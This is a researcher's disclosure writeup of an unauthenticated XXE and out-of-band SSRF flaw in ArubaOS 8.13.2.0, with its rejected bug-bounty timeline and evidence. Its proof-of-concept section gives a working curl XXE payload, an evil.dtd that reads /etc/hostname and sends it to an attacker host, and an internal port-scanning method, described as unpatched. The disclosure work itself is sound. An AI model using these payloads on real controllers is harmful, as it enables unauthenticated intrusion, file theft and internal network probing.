Pre-Authentication XXE → OOB SSRF in ArubaOS 8.13.2.0 (Port 32000)

Submission ID: 9e946ca3 — HPE Networking Product Public Program (Bugcrowd)
Status: Closed as “Not Applicable — theoretical / no valid PoC”
GitHub: github.com/JM00NJ/HPE-Aruba-AOS8-Vulnerabilities

Background

This is a documentation of a pre-authentication XML External Entity (XXE) injection vulnerability with confirmed Out-of-Band (OOB) Server-Side Request Forgery (SSRF) in ArubaOS 8.13.2.0 LSR. The vulnerability was submitted to the HPE Networking Bug Bounty Program on Bugcrowd on May 6, 2026.

Despite four independent pieces of evidence — including wire-level packet captures and the target system’s own daemon logs confirming server-side execution — the submission was closed as “theoretical / no valid PoC.” Both Requests for Response went unanswered. This writeup documents the vulnerability, the evidence, and the full timeline so the security community can evaluate independently.

Target

Field	Value
Product	HPE Aruba Networking Wireless — AOS-8 Controller
Version	ArubaOS 8.13.2.0 LSR (Build 95415, compiled 2026-03-25)
Model	ArubaMC-VA-US
Endpoint	`http://<device-ip>:32000/`
Authentication	None required
CVSS v3.1	9.3 Critical — `AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N`
CWE	CWE-611: Improper Restriction of XML External Entity Reference

Vulnerability Description

Port 32000/TCP on ArubaOS 8.13.2.0 exposes an XML management interface (default-xml-api AAA profile) reachable without any authentication. The XML parser processes SYSTEM external entity declarations, resolving them against attacker-controlled infrastructure.

This enables:

OOB SSRF — forcing the controller to initiate outbound HTTP connections to arbitrary hosts
Internal network enumeration — using the controller as an unwilling proxy to probe internal services
External DTD resolution — fetching and processing attacker-hosted DTD files

The endpoint is not a misconfiguration. The AAA profile default-xml-api ships with no authentication configured.

Proof of Concept

Step 1 — Direct OOB SSRF

1

nc -lvp 9999

1
2
3
4
5


curl -s -X POST "http://<target>:32000/" \
  -H "Content-Type: text/xml" \
  -d '<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://<attacker>:9999/test">]>
<aruba><opcode>&xxe;</opcode></aruba>'

Observed on attacker listener:

Connection received on 192.168.56.50 36048
GET /test HTTP/1.0
Host: <attacker-ip>:9999

Step 2 — External DTD Resolution

evil.dtd:

1
2
3
4


<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://<attacker>:9999/?d=%file;'>">
%eval;
%send;

Observed on attacker HTTP server:

192.168.56.50 - [06/May/2026 02:33:43] "GET /evil.dtd HTTP/1.0" 200 -
192.168.56.50 - [06/May/2026 02:36:10] "GET /evil.dtd HTTP/1.0" 200 -
192.168.56.50 - [06/May/2026 02:38:17] "GET /evil.dtd HTTP/1.0" 200 -

Step 3 — Internal Port Scanning via SSRF

The controller returned <dialog>success</dialog> for probes against 127.0.0.1 on ports: 22, 80, 443, 4343, 8080, 8443, 3306, 5432, 9200 — all confirmed open in under 30 seconds.

Evidence

Evidence 1 — Wire-Level Packet Capture

obb_proof.pcapng confirms controller-initiated TCP connection to attacker infrastructure, full 3-way handshake, and GET /test HTTP/1.0 transmission.

Evidence 2 — Target System’s Own Daemon Logs

May 13 07:31:56 |sshd| Bad protocol version identification 'GET / HTTP/1.0' from 127.0.0.1 port 33144

This log entry can only be produced when a server-side process connects to local sshd and sends an HTTP request. No external actor can produce a 127.0.0.1-sourced connection to a service on localhost.

The triage response was never reconciled with this log entry.

Evidence 3 — External DTD Fetch Log

Three independent HTTP server log entries confirming controller-fetched attacker-hosted content (timestamps: 02:33, 02:36, 02:38).

Evidence 4 — Internal Port Scan

9 internal ports confirmed open via <dialog>success</dialog> responses. Screenshot and reproduction script attached to original submission.

Why The “Theoretical” Classification Is Incorrect

CWE-611 does not require in-band file exfiltration to be valid. OOB callback confirming external entity resolution on a pre-authentication endpoint is the vulnerability, consistent with OWASP XXE Prevention Cheat Sheet and PortSwigger Blind XXE.

Timeline

Date	Event
06 May 2026	Submission created (9e946ca3)
10 May 2026	N/A — “theoretical, no valid PoC”
11 May 2026	First RaR submitted
13 May 2026	sshd log evidence added
27 May 2026	First RaR expired — no response
28 May 2026	Second and final RaR
31 May 2026	Researcher concluded Bugcrowd disclosure

Total: 25 days. Triage response to all evidence: none.

Disclosure Note

The program has determined no vulnerability exists. No fix is forthcoming, no advisory will be published. The 60-day post-advisory window does not apply to findings the vendor has declined to acknowledge. This writeup is published for independent community evaluation.

Vesqer / JM00NJ — netacoding.com

🎓 Learning Path & Metadata

Background#

Target#

Vulnerability Description#

Proof of Concept#

Step 1 — Direct OOB SSRF#

Step 2 — External DTD Resolution#

Step 3 — Internal Port Scanning via SSRF#

Evidence#

Evidence 1 — Wire-Level Packet Capture#

Evidence 2 — Target System’s Own Daemon Logs#

Evidence 3 — External DTD Fetch Log#

Evidence 4 — Internal Port Scan#

Why The “Theoretical” Classification Is Incorrect#

Timeline#

Disclosure Note#